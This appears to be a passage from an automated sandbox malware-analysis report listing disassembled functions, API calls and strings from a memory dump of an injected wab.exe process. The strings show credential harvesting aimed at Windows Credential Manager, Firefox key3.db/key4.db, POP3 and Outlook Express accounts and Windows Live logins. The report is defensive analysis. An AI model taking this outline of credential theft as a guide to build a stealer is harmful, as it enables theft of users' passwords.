                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$strlen
                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                • API String ID: 2619041689-3408036318
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4288758904-3916222277
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                                                • _wcsncoll.MSVCRT ref: 00408794
                                                                                                                • memset.MSVCRT ref: 0040882A
                                                                                                                • memcpy.MSVCRT ref: 00408849
                                                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                • String ID: J$Microsoft_WinInet
                                                                                                                • API String ID: 2203907242-260894208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                • memcpy.MSVCRT ref: 00410961
                                                                                                                Strings
                                                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromStringUuid$memcpy
                                                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                • API String ID: 2859077140-2022683286
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                • strlen.MSVCRT ref: 00406CCC
                                                                                                                • _mbscpy.MSVCRT ref: 00406CDC
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                • _mbscpy.MSVCRT ref: 00406CF6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                • _mbscpy.MSVCRT ref: 00409686
                                                                                                                • _mbscpy.MSVCRT ref: 00409696
                                                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                • out of memory, xrefs: 0042EBEF
                                                                                                                • database %s is already in use, xrefs: 0042E9CE
                                                                                                                • database is already attached, xrefs: 0042EA97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                • memcpy.MSVCRT ref: 00409C97
                                                                                                                • memcpy.MSVCRT ref: 00409CB4
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                • String ID: 0wE$d
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringstrchr
                                                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                • memset.MSVCRT ref: 0040FA1E
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                                                • _mbscpy.MSVCRT ref: 00403748
                                                                                                                • _mbscpy.MSVCRT ref: 00403758
                                                                                                                • strlen.MSVCRT ref: 00403778
                                                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                                                • _mbscpy.MSVCRT ref: 004037B2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                • String ID: %s@gmail.com
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004094C8
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                • memset.MSVCRT ref: 0040950C
                                                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item$DialogMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2485852401-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                • String ID:
                                                                                                                • API String ID: 3642520215-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2313361498-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                                                • String ID:
                                                                                                                • API String ID: 2126104762-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 1999381814-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                • API String ID: 1297977491-3883738016
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                                                                                                • memcpy.MSVCRT ref: 0044972E
                                                                                                                • memcpy.MSVCRT ref: 0044977B
                                                                                                                • memcpy.MSVCRT ref: 004497F6
                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                                                                                                • memcpy.MSVCRT ref: 00449846
                                                                                                                • memcpy.MSVCRT ref: 00449887
                                                                                                                • memcpy.MSVCRT ref: 004498B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: gj
                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm$__aullrem
                                                                                                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                • API String ID: 643879872-978417875
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                                                • String ID: user_pref("
                                                                                                                • API String ID: 765841271-2487180061
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                • memset.MSVCRT ref: 004058C3
                                                                                                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                • SetFocus.USER32(?), ref: 00405976
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4281309102-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                                • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                • sprintf.MSVCRT ref: 0040A921
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 1631269929-4153097237
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040810E
                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,7508EB20,?), ref: 004081B9
                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                • API String ID: 524865279-2190619648
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                • String ID: key3.db$key4.db
                                                                                                                • API String ID: 581844971-3557030128
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2300387033-3849865405
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3756086014-1363028141
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscat$memsetsprintf
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 125969286-791839006
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
